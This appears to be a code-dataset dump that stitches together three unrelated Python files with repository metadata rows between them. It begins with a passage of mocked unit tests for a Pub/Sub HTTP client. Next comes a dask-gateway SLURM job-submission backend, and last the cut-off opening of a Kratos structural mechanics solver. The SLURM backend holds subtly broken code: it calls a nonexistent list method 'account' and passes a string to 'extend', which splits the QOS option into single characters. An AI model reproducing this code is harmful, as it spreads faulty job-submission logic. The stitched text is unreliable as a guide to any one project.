MESSAGE = {'data': PAYLOAD, 'attributes': {}}
RETURNED = {'messageIds': []}
connection = _Connection(RETURNED, RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
api.topic_publish(self.TOPIC_PATH, [MESSAGE])
api.topic_publish(self.TOPIC_PATH, [MESSAGE])
messages = connection._called_with['data']['messages']
self.assertEqual(len(messages), 1)
self.assertEqual(messages[0]['data'], B64_PAYLOAD)
def test_topic_publish_miss(self):
import base64
from google.cloud.exceptions import NotFound
PAYLOAD = b'This is the message text'
B64_PAYLOAD = base64.b64encode(PAYLOAD).decode('ascii')
MESSAGE = {'data': PAYLOAD, 'attributes': {}}
B64MSG = {'data': B64_PAYLOAD, 'attributes': {}}
connection = _Connection()
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
with self.assertRaises(NotFound):
api.topic_publish(self.TOPIC_PATH, [MESSAGE])
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:publish' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'],
{'messages': [B64MSG]})
def test_topic_list_subscriptions_no_paging(self):
from google.cloud.pubsub.topic import Topic
from google.cloud.pubsub.subscription import Subscription
local_sub_path = 'projects/%s/subscriptions/%s' % (
self.PROJECT, self.SUB_NAME)
RETURNED = {'subscriptions': [local_sub_path]}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
topic = Topic(self.TOPIC_NAME, client)
iterator = api.topic_list_subscriptions(topic)
subscriptions = list(iterator)
next_token = iterator.next_page_token
self.assertIsNone(next_token)
self.assertEqual(len(subscriptions), 1)
subscription = subscriptions[0]
self.assertIsInstance(subscription, Subscription)
self.assertEqual(subscription.name, self.SUB_NAME)
self.assertEqual(subscription.topic, topic)
self.assertIs(subscription._client, client)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_TOPIC_SUBSCRIPTIONS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'], {})
def test_topic_list_subscriptions_with_paging(self):
import six
from google.cloud.pubsub.subscription import Subscription
from google.cloud.pubsub.topic import Topic
TOKEN1 = 'TOKEN1'
TOKEN2 = 'TOKEN2'
SIZE = 1
local_sub_path = 'projects/%s/subscriptions/%s' % (
self.PROJECT, self.SUB_NAME)
RETURNED = {
'subscriptions': [local_sub_path],
'nextPageToken': TOKEN2,
}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
topic = Topic(self.TOPIC_NAME, client)
iterator = api.topic_list_subscriptions(
topic, page_token=TOKEN1, page_size=SIZE)
page = six.next(iterator.pages)
subscriptions = list(page)
next_token = iterator.next_page_token
self.assertEqual(next_token, TOKEN2)
self.assertEqual(len(subscriptions), 1)
subscription = subscriptions[0]
self.assertIsInstance(subscription, Subscription)
self.assertEqual(subscription.name, self.SUB_NAME)
self.assertEqual(subscription.topic, topic)
self.assertIs(subscription._client, client)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_TOPIC_SUBSCRIPTIONS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'],
{'pageToken': TOKEN1, 'pageSize': SIZE})
def test_topic_list_subscriptions_missing_key(self):
from google.cloud.pubsub.topic import Topic
connection = _Connection({})
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
topic = Topic(self.TOPIC_NAME, client)
iterator = api.topic_list_subscriptions(topic)
subscriptions = list(iterator)
next_token = iterator.next_page_token
self.assertEqual(len(subscriptions), 0)
self.assertIsNone(next_token)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_TOPIC_SUBSCRIPTIONS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'], {})
def test_topic_list_subscriptions_miss(self):
from google.cloud.exceptions import NotFound
from google.cloud.pubsub.topic import Topic
connection = _Connection()
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
with self.assertRaises(NotFound):
topic = Topic(self.TOPIC_NAME, client)
list(api.topic_list_subscriptions(topic))
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_TOPIC_SUBSCRIPTIONS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'], {})
class Test_SubscriberAPI(_Base):
@staticmethod
def _get_target_class():
from google.cloud.pubsub._http import _SubscriberAPI
return _SubscriberAPI
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
def test_ctor(self):
connection = _Connection()
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
self.assertIs(api._client, client)
self.assertEqual(api.api_request, connection.api_request)
def test_list_subscriptions_no_paging(self):
from google.cloud.pubsub.client import Client
from google.cloud.pubsub.subscription import Subscription
from google.cloud.pubsub.topic import Topic
SUB_INFO = {'name': self.SUB_PATH, 'topic': self.TOPIC_PATH}
RETURNED = {'subscriptions': [SUB_INFO]}
connection = _Connection(RETURNED)
creds = _make_credentials()
client = Client(project=self.PROJECT, credentials=creds)
client._connection = connection
api = self._make_one(client)
iterator = api.list_subscriptions(self.PROJECT)
subscriptions = list(iterator)
next_token = iterator.next_page_token
# Check the token returned.
self.assertIsNone(next_token)
# Check the subscription object returned.
self.assertEqual(len(subscriptions), 1)
subscription = subscriptions[0]
self.assertIsInstance(subscription, Subscription)
self.assertEqual(subscription.name, self.SUB_NAME)
self.assertIsInstance(subscription.topic, Topic)
self.assertEqual(subscription.topic.name, self.TOPIC_NAME)
self.assertIs(subscription._client, client)
self.assertEqual(subscription.project, self.PROJECT)
self.assertIsNone(subscription.ack_deadline)
self.assertIsNone(subscription.push_endpoint)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_SUBSCRIPTIONS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'], {})
def test_list_subscriptions_with_paging(self):
import six
from google.cloud.pubsub.client import Client
from google.cloud.pubsub.subscription import Subscription
from google.cloud.pubsub.topic import Topic
TOKEN1 = 'TOKEN1'
TOKEN2 = 'TOKEN2'
SIZE = 1
SUB_INFO = {'name': self.SUB_PATH, 'topic': self.TOPIC_PATH}
RETURNED = {
'subscriptions': [SUB_INFO],
'nextPageToken': 'TOKEN2',
}
connection = _Connection(RETURNED)
creds = _make_credentials()
client = Client(project=self.PROJECT, credentials=creds)
client._connection = connection
api = self._make_one(client)
iterator = api.list_subscriptions(
self.PROJECT, page_token=TOKEN1, page_size=SIZE)
page = six.next(iterator.pages)
subscriptions = list(page)
next_token = iterator.next_page_token
# Check the token returned.
self.assertEqual(next_token, TOKEN2)
# Check the subscription object returned.
self.assertEqual(len(subscriptions), 1)
subscription = subscriptions[0]
self.assertIsInstance(subscription, Subscription)
self.assertEqual(subscription.name, self.SUB_NAME)
self.assertIsInstance(subscription.topic, Topic)
self.assertEqual(subscription.topic.name, self.TOPIC_NAME)
self.assertIs(subscription._client, client)
self.assertEqual(subscription.project, self.PROJECT)
self.assertIsNone(subscription.ack_deadline)
self.assertIsNone(subscription.push_endpoint)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_SUBSCRIPTIONS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'],
{'pageToken': TOKEN1, 'pageSize': SIZE})
def test_list_subscriptions_missing_key(self):
RETURNED = {}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
iterator = api.list_subscriptions(self.PROJECT)
subscriptions = list(iterator)
next_token = iterator.next_page_token
self.assertEqual(len(subscriptions), 0)
self.assertIsNone(next_token)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_SUBSCRIPTIONS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'], {})
def test_subscription_create_defaults(self):
RESOURCE = {'topic': self.TOPIC_PATH}
RETURNED = RESOURCE.copy()
RETURNED['name'] = self.SUB_PATH
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
resource = api.subscription_create(self.SUB_PATH, self.TOPIC_PATH)
self.assertEqual(resource, RETURNED)
self.assertEqual(connection._called_with['method'], 'PUT')
path = '/%s' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], RESOURCE)
def test_subscription_create_retain_messages(self):
import datetime
RESOURCE = {'topic': self.TOPIC_PATH,
'retainAckedMessages': True,
'messageRetentionDuration': {
'seconds': 1729,
'nanos': 2718 * 1000
}
}
RETURNED = RESOURCE.copy()
RETURNED['name'] = self.SUB_PATH
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
resource = api.subscription_create(
self.SUB_PATH, self.TOPIC_PATH,
retain_acked_messages=True,
message_retention_duration=datetime.timedelta(
seconds=1729, microseconds=2718))
self.assertEqual(resource, RETURNED)
self.assertEqual(connection._called_with['method'], 'PUT')
path = '/%s' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], RESOURCE)
def test_subscription_create_explicit(self):
ACK_DEADLINE = 90
PUSH_ENDPOINT = 'https://api.example.com/push'
RESOURCE = {
'topic': self.TOPIC_PATH,
'ackDeadlineSeconds': ACK_DEADLINE,
'pushConfig': {
'pushEndpoint': PUSH_ENDPOINT,
},
}
RETURNED = RESOURCE.copy()
RETURNED['name'] = self.SUB_PATH
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
resource = api.subscription_create(
self.SUB_PATH, self.TOPIC_PATH,
ack_deadline=ACK_DEADLINE, push_endpoint=PUSH_ENDPOINT)
self.assertEqual(resource, RETURNED)
self.assertEqual(connection._called_with['method'], 'PUT')
path = '/%s' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], RESOURCE)
def test_subscription_get(self):
ACK_DEADLINE = 90
PUSH_ENDPOINT = 'https://api.example.com/push'
RETURNED = {
'topic': self.TOPIC_PATH,
'name': self.SUB_PATH,
'ackDeadlineSeconds': ACK_DEADLINE,
'pushConfig': {'pushEndpoint': PUSH_ENDPOINT},
}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
resource = api.subscription_get(self.SUB_PATH)
self.assertEqual(resource, RETURNED)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
def test_subscription_delete(self):
RETURNED = {}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
api.subscription_delete(self.SUB_PATH)
self.assertEqual(connection._called_with['method'], 'DELETE')
path = '/%s' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
def test_subscription_modify_push_config(self):
PUSH_ENDPOINT = 'https://api.example.com/push'
BODY = {
'pushConfig': {'pushEndpoint': PUSH_ENDPOINT},
}
RETURNED = {}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
api.subscription_modify_push_config(self.SUB_PATH, PUSH_ENDPOINT)
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:modifyPushConfig' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], BODY)
def test_subscription_pull_defaults(self):
import base64
PAYLOAD = b'This is the message text'
B64 = base64.b64encode(PAYLOAD).decode('ascii')
ACK_ID = 'DEADBEEF'
MSG_ID = 'BEADCAFE'
MESSAGE = {'messageId': MSG_ID, 'data': B64, 'attributes': {'a': 'b'}}
RETURNED = {
'receivedMessages': [{'ackId': ACK_ID, 'message': MESSAGE}],
}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
BODY = {
'returnImmediately': False,
'maxMessages': 1,
}
received = api.subscription_pull(self.SUB_PATH)
self.assertEqual(received, RETURNED['receivedMessages'])
self.assertEqual(received[0]['message']['data'], PAYLOAD)
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:pull' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], BODY)
def test_subscription_pull_explicit(self):
import base64
PAYLOAD = b'This is the message text'
B64 = base64.b64encode(PAYLOAD).decode('ascii')
ACK_ID = 'DEADBEEF'
MSG_ID = 'BEADCAFE'
MESSAGE = {'messageId': MSG_ID, 'data': B64, 'attributes': {'a': 'b'}}
RETURNED = {
'receivedMessages': [{'ackId': ACK_ID, 'message': MESSAGE}],
}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
MAX_MESSAGES = 10
BODY = {
'returnImmediately': True,
'maxMessages': MAX_MESSAGES,
}
received = api.subscription_pull(
self.SUB_PATH, return_immediately=True, max_messages=MAX_MESSAGES)
self.assertEqual(received, RETURNED['receivedMessages'])
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:pull' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], BODY)
def test_subscription_acknowledge(self):
ACK_ID1 = 'DEADBEEF'
ACK_ID2 = 'BEADCAFE'
BODY = {
'ackIds': [ACK_ID1, ACK_ID2],
}
RETURNED = {}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
api.subscription_acknowledge(self.SUB_PATH, [ACK_ID1, ACK_ID2])
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:acknowledge' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], BODY)
def test_subscription_modify_ack_deadline(self):
ACK_ID1 = 'DEADBEEF'
ACK_ID2 = 'BEADCAFE'
NEW_DEADLINE = 90
BODY = {
'ackIds': [ACK_ID1, ACK_ID2],
'ackDeadlineSeconds': NEW_DEADLINE,
}
RETURNED = {}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
api.subscription_modify_ack_deadline(
self.SUB_PATH, [ACK_ID1, ACK_ID2], NEW_DEADLINE)
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:modifyAckDeadline' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], BODY)
def test_list_snapshots_no_paging(self):
from google.cloud.pubsub.client import Client
from google.cloud.pubsub.snapshot import Snapshot
local_snapshot_path = 'projects/%s/snapshots/%s' % (
self.PROJECT, self.SNAPSHOT_NAME)
local_topic_path = 'projects/%s/topics/%s' % (
self.PROJECT, self.TOPIC_NAME)
RETURNED = {'snapshots': [{
'name': local_snapshot_path,
'topic': local_topic_path,
}],
}
connection = _Connection(RETURNED)
creds = _make_credentials()
client = Client(project=self.PROJECT, credentials=creds)
client._connection = connection
api = self._make_one(client)
iterator = api.list_snapshots(self.PROJECT)
snapshots = list(iterator)
next_token = iterator.next_page_token
self.assertIsNone(next_token)
self.assertEqual(len(snapshots), 1)
snapshot = snapshots[0]
self.assertIsInstance(snapshot, Snapshot)
self.assertEqual(snapshot.topic.name, self.TOPIC_NAME)
self.assertIs(snapshot._client, client)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_SNAPSHOTS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'], {})
def test_list_snapshots_with_paging(self):
import six
from google.cloud.pubsub.client import Client
from google.cloud.pubsub.snapshot import Snapshot
TOKEN1 = 'TOKEN1'
TOKEN2 = 'TOKEN2'
SIZE = 1
local_snapshot_path = 'projects/%s/snapshots/%s' % (
self.PROJECT, self.SNAPSHOT_NAME)
local_topic_path = 'projects/%s/topics/%s' % (
self.PROJECT, self.TOPIC_NAME)
RETURNED = {
'snapshots': [{
'name': local_snapshot_path,
'topic': local_topic_path,
}],
'nextPageToken': TOKEN2,
}
connection = _Connection(RETURNED)
creds = _make_credentials()
client = Client(project=self.PROJECT, credentials=creds)
client._connection = connection
api = self._make_one(client)
iterator = api.list_snapshots(
self.PROJECT, page_token=TOKEN1, page_size=SIZE)
page = six.next(iterator.pages)
snapshots = list(page)
next_token = iterator.next_page_token
self.assertEqual(next_token, TOKEN2)
self.assertEqual(len(snapshots), 1)
snapshot = snapshots[0]
self.assertIsInstance(snapshot, Snapshot)
self.assertEqual(snapshot.topic.name, self.TOPIC_NAME)
self.assertIs(snapshot._client, client)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_SNAPSHOTS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'],
{'pageToken': TOKEN1, 'pageSize': SIZE})
def test_subscription_seek_snapshot(self):
local_snapshot_path = 'projects/%s/snapshots/%s' % (
self.PROJECT, self.SNAPSHOT_NAME)
RETURNED = {}
BODY = {
'snapshot': local_snapshot_path
}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
api.subscription_seek(
self.SUB_PATH, snapshot=local_snapshot_path)
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:seek' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], BODY)
def test_subscription_seek_time(self):
time = '12345'
RETURNED = {}
BODY = {
'time': time
}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
api.subscription_seek(self.SUB_PATH, time=time)
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:seek' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], BODY)
def test_snapshot_create(self):
RETURNED = {
'name': self.SNAPSHOT_PATH,
'subscription': self.SUB_PATH
}
BODY = {
'subscription': self.SUB_PATH
}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
resource = api.snapshot_create(self.SNAPSHOT_PATH, self.SUB_PATH)
self.assertEqual(resource, RETURNED)
self.assertEqual(connection._called_with['method'], 'PUT')
path = '/%s' % (self.SNAPSHOT_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], BODY)
def test_snapshot_create_already_exists(self):
from google.cloud.exceptions import NotFound
BODY = {
'subscription': self.SUB_PATH
}
connection = _Connection()
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
with self.assertRaises(NotFound):
resource = api.snapshot_create(self.SNAPSHOT_PATH, self.SUB_PATH)
self.assertEqual(connection._called_with['method'], 'PUT')
path = '/%s' % (self.SNAPSHOT_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], BODY)
def test_snapshot_delete(self):
RETURNED = {}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
api.snapshot_delete(self.SNAPSHOT_PATH)
self.assertEqual(connection._called_with['method'], 'DELETE')
path = '/%s' % (self.SNAPSHOT_PATH,)
self.assertEqual(connection._called_with['path'], path)
class Test_IAMPolicyAPI(_Base):
@staticmethod
def _get_target_class():
from google.cloud.pubsub._http import _IAMPolicyAPI
return _IAMPolicyAPI
def test_ctor(self):
connection = _Connection()
client = _Client(connection, None)
api = self._make_one(client)
self.assertEqual(api.api_request, connection.api_request)
def test_get_iam_policy(self):
from google.cloud.pubsub.iam import OWNER_ROLE
from google.cloud.pubsub.iam import EDITOR_ROLE
from google.cloud.pubsub.iam import VIEWER_ROLE
OWNER1 = 'user:phred@example.com'
OWNER2 = 'group:cloud-logs@google.com'
EDITOR1 = 'domain:google.com'
EDITOR2 = 'user:phred@example.com'
VIEWER1 = 'serviceAccount:1234-abcdef@service.example.com'
VIEWER2 = 'user:phred@example.com'
RETURNED = {
'etag': 'DEADBEEF',
'version': 17,
'bindings': [
{'role': OWNER_ROLE, 'members': [OWNER1, OWNER2]},
{'role': EDITOR_ROLE, 'members': [EDITOR1, EDITOR2]},
{'role': VIEWER_ROLE, 'members': [VIEWER1, VIEWER2]},
],
}
connection = _Connection(RETURNED)
client = _Client(connection, None)
api = self._make_one(client)
policy = api.get_iam_policy(self.TOPIC_PATH)
self.assertEqual(policy, RETURNED)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s:getIamPolicy' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
def test_set_iam_policy(self):
from google.cloud.pubsub.iam import OWNER_ROLE
from google.cloud.pubsub.iam import EDITOR_ROLE
from google.cloud.pubsub.iam import VIEWER_ROLE
OWNER1 = 'user:phred@example.com'
OWNER2 = 'group:cloud-logs@google.com'
EDITOR1 = 'domain:google.com'
EDITOR2 = 'user:phred@example.com'
VIEWER1 = 'serviceAccount:1234-abcdef@service.example.com'
VIEWER2 = 'user:phred@example.com'
POLICY = {
'etag': 'DEADBEEF',
'version': 17,
'bindings': [
{'role': OWNER_ROLE, 'members': [OWNER1, OWNER2]},
{'role': EDITOR_ROLE, 'members': [EDITOR1, EDITOR2]},
{'role': VIEWER_ROLE, 'members': [VIEWER1, VIEWER2]},
],
}
RETURNED = POLICY.copy()
connection = _Connection(RETURNED)
client = _Client(connection, None)
api = self._make_one(client)
policy = api.set_iam_policy(self.TOPIC_PATH, POLICY)
self.assertEqual(policy, RETURNED)
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:setIamPolicy' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'],
{'policy': POLICY})
def test_test_iam_permissions(self):
from google.cloud.pubsub.iam import OWNER_ROLE
from google.cloud.pubsub.iam import EDITOR_ROLE
from google.cloud.pubsub.iam import VIEWER_ROLE
ALL_ROLES = [OWNER_ROLE, EDITOR_ROLE, VIEWER_ROLE]
ALLOWED = ALL_ROLES[1:]
RETURNED = {'permissions': ALLOWED}
connection = _Connection(RETURNED)
client = _Client(connection, None)
api = self._make_one(client)
allowed = api.test_iam_permissions(self.TOPIC_PATH, ALL_ROLES)
self.assertEqual(allowed, ALLOWED)
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:testIamPermissions' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'],
{'permissions': ALL_ROLES})
def test_test_iam_permissions_missing_key(self):
from google.cloud.pubsub.iam import OWNER_ROLE
from google.cloud.pubsub.iam import EDITOR_ROLE
from google.cloud.pubsub.iam import VIEWER_ROLE
ALL_ROLES = [OWNER_ROLE, EDITOR_ROLE, VIEWER_ROLE]
RETURNED = {}
connection = _Connection(RETURNED)
client = _Client(connection, None)
api = self._make_one(client)
allowed = api.test_iam_permissions(self.TOPIC_PATH, ALL_ROLES)
self.assertEqual(allowed, [])
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:testIamPermissions' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'],
{'permissions': ALL_ROLES})
class Test__transform_messages_base64_empty(unittest.TestCase):
def _call_fut(self, messages, transform, key=None):
from google.cloud.pubsub._http import _transform_messages_base64
return _transform_messages_base64(messages, transform, key)
def test__transform_messages_base64_empty_message(self):
from base64 import b64decode
DATA = [{'message': {}}]
self._call_fut(DATA, b64decode, 'message')
self.assertEqual(DATA, [{'message': {}}])
def test__transform_messages_base64_empty_data(self):
from base64 import b64decode
DATA = [{'message': {'data': b''}}]
self._call_fut(DATA, b64decode, 'message')
self.assertEqual(DATA, [{'message': {'data': b''}}])
def test__transform_messages_base64_pull(self):
from base64 import b64encode
DATA = [{'message': {'data': b'testing 1 2 3'}}]
self._call_fut(DATA, b64encode, 'message')
self.assertEqual(DATA[0]['message']['data'],
b64encode(b'testing 1 2 3'))
def test__transform_messages_base64_publish(self):
from base64 import b64encode
DATA = [{'data': b'testing 1 2 3'}]
self._call_fut(DATA, b64encode)
self.assertEqual(DATA[0]['data'], b64encode(b'testing 1 2 3'))
class _Connection(object):
_called_with = None
_no_response_error = None
def __init__(self, *responses):
self._responses = responses
def api_request(self, **kw):
from google.cloud.exceptions import NotFound
self._called_with = kw
try:
response, self._responses = self._responses[0], self._responses[1:]
except IndexError:
err_class = self._no_response_error or NotFound
raise err_class('miss')
return response
class _Client(object):
def __init__(self, connection, project):
self._connection = connection
self.project = project
| 37.235849
| 79
| 0.638621
|
794fe19dcec28ad6fb64a0917e1c07f83b92917e
| 3,959
|
py
|
Python
|
dask-gateway-server/dask_gateway_server/backends/jobqueue/slurm.py
|
AndreaGiardini/dask-gateway
|
c2583548df19359d24031e1dd9161c616d3bed50
|
[
"BSD-3-Clause"
] | 69
|
2019-09-19T06:19:48.000Z
|
2022-02-04T23:01:15.000Z
|
dask-gateway-server/dask_gateway_server/backends/jobqueue/slurm.py
|
AndreaGiardini/dask-gateway
|
c2583548df19359d24031e1dd9161c616d3bed50
|
[
"BSD-3-Clause"
] | 318
|
2019-09-18T18:42:57.000Z
|
2022-03-31T11:05:38.000Z
|
dask-gateway-server/dask_gateway_server/backends/jobqueue/slurm.py
|
AndreaGiardini/dask-gateway
|
c2583548df19359d24031e1dd9161c616d3bed50
|
[
"BSD-3-Clause"
] | 61
|
2019-09-18T18:09:56.000Z
|
2022-03-25T20:35:11.000Z
|
import math
import os
import shutil
from traitlets import Unicode, default
from .base import JobQueueBackend, JobQueueClusterConfig
from ...traitlets import Type
__all__ = ("SlurmBackend", "SlurmClusterConfig")
def slurm_format_memory(n):
"""Format memory in bytes for use with slurm."""
if n >= 10 * (1024 ** 3):
return "%dG" % math.ceil(n / (1024 ** 3))
if n >= 10 * (1024 ** 2):
return "%dM" % math.ceil(n / (1024 ** 2))
if n >= 10 * 1024:
return "%dK" % math.ceil(n / 1024)
return "1K"
class SlurmClusterConfig(JobQueueClusterConfig):
"""Dask cluster configuration options when running on SLURM"""
partition = Unicode("", help="The partition to submit jobs to.", config=True)
qos = Unicode("", help="QOS string associated with each job.", config=True)
account = Unicode("", help="Account string associated with each job.", config=True)
class SlurmBackend(JobQueueBackend):
"""A backend for deploying Dask on a Slurm cluster."""
cluster_config_class = Type(
"dask_gateway_server.backends.jobqueue.slurm.SlurmClusterConfig",
klass="dask_gateway_server.backends.base.ClusterConfig",
help="The cluster config class to use",
config=True,
)
@default("submit_command")
def _default_submit_command(self):
return shutil.which("sbatch") or "sbatch"
@default("cancel_command")
def _default_cancel_command(self):
return shutil.which("scancel") or "scancel"
@default("status_command")
def _default_status_command(self):
return shutil.which("squeue") or "squeue"
def get_submit_cmd_env_stdin(self, cluster, worker=None):
cmd = [self.submit_command, "--parsable"]
cmd.append("--job-name=dask-gateway")
if cluster.config.partition:
cmd.append("--partition=" + cluster.config.partition)
if cluster.config.account:
cmd.account("--account=" + cluster.config.account)
if cluster.config.qos:
cmd.extend("--qos=" + cluster.config.qos)
if worker:
cpus = cluster.config.worker_cores
mem = slurm_format_memory(cluster.config.worker_memory)
log_file = "dask-worker-%s.log" % worker.name
script = "\n".join(
[
"#!/bin/sh",
cluster.config.worker_setup,
" ".join(self.get_worker_command(cluster, worker.name)),
]
)
env = self.get_worker_env(cluster)
else:
cpus = cluster.config.scheduler_cores
mem = slurm_format_memory(cluster.config.scheduler_memory)
log_file = "dask-scheduler-%s.log" % cluster.name
script = "\n".join(
[
"#!/bin/sh",
cluster.config.scheduler_setup,
" ".join(self.get_scheduler_command(cluster)),
]
)
env = self.get_scheduler_env(cluster)
staging_dir = self.get_staging_directory(cluster)
cmd.extend(
[
"--chdir=" + staging_dir,
"--output=" + os.path.join(staging_dir, log_file),
"--cpus-per-task=%d" % cpus,
"--mem=%s" % mem,
"--export=%s" % (",".join(sorted(env))),
]
)
return cmd, env, script
def get_stop_cmd_env(self, job_id):
return [self.cancel_command, job_id], {}
def get_status_cmd_env(self, job_ids):
cmd = [self.status_command, "-h", "--job=%s" % ",".join(job_ids), "-o", "%i %t"]
return cmd, {}
def parse_job_states(self, stdout):
states = {}
for l in stdout.splitlines():
job_id, state = l.split()
states[job_id] = state in ("R", "CG", "PD", "CF")
return states
def parse_job_id(self, stdout):
return stdout.strip()
| 32.45082
| 88
| 0.576156
|
794fe2ea8816533628ae9764137dfbcb380f78d9
| 30,200
|
py
|
Python
|
applications/StructuralMechanicsApplication/python_scripts/structural_mechanics_solver.py
|
AndreaVoltan/MyKratos7.0
|
e977752722e8ef1b606f25618c4bf8fd04c434cc
|
[
"BSD-4-Clause"
] | 2
|
2020-04-30T19:13:08.000Z
|
2021-04-14T19:40:47.000Z
|
applications/StructuralMechanicsApplication/python_scripts/structural_mechanics_solver.py
|
AndreaVoltan/MyKratos7.0
|
e977752722e8ef1b606f25618c4bf8fd04c434cc
|
[
"BSD-4-Clause"
] | 1
|
2020-04-30T19:19:09.000Z
|
2020-05-02T14:22:36.000Z
|
applications/StructuralMechanicsApplication/python_scripts/structural_mechanics_solver.py
|
AndreaVoltan/MyKratos7.0
|
e977752722e8ef1b606f25618c4bf8fd04c434cc
|
[
"BSD-4-Clause"
] | 1
|
2020-06-12T08:51:24.000Z
|
2020-06-12T08:51:24.000Z
|
from __future__ import print_function, absolute_import, division # makes KratosMultiphysics backward compatible with python 2.6 and 2.7
# Importing the Kratos Library
import KratosMultiphysics
# Import applications
import KratosMultiphysics.StructuralMechanicsApplication as StructuralMechanicsApplication
# Importing the base class
from python_solver import PythonSolver
def CreateSolver(model, custom_settings):
return MechanicalSolver(model, custom_settings)
class MechanicalSolver(PythonSolver):
"""The base class for structural mechanics solvers.
This class provides functions for importing and exporting models,
adding nodal variables and dofs and solving each solution step.
Derived classes must override the function _create_solution_scheme which
constructs and returns a solution scheme. Depending on the type of
solver, derived classes may also need to override the following functions:
_create_solution_scheme
_create_convergence_criterion
_create_linear_solver
